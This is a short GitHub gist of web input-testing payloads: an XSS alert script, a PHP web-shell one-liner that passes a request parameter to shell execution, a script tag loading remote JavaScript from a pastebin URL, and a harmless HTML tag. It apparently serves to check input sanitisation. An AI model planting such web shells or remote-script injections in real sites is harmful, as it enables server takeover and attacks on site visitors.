Skip to content

Instantly share code, notes, and snippets.

@c3budiman
Last active June 10, 2022 14:57
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save c3budiman/9f7ddf08f52e1b332aa12a707a561934 to your computer and use it in GitHub Desktop.
Save c3budiman/9f7ddf08f52e1b332aa12a707a561934 to your computer and use it in GitHub Desktop.
Testing Input Scenario IJLN
1.
<script>alert("XSS VULN");</script>
2.
<?php $cmd=$GET['mrxy'];$out=shell_ecex($cmd); echo "<pre>".$out."</pre>"?>
3.
<script type="text/javascript" src="https://pastebin.com/raw/BndBwF1Y"></script>
4.
<h1> tes </h1>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment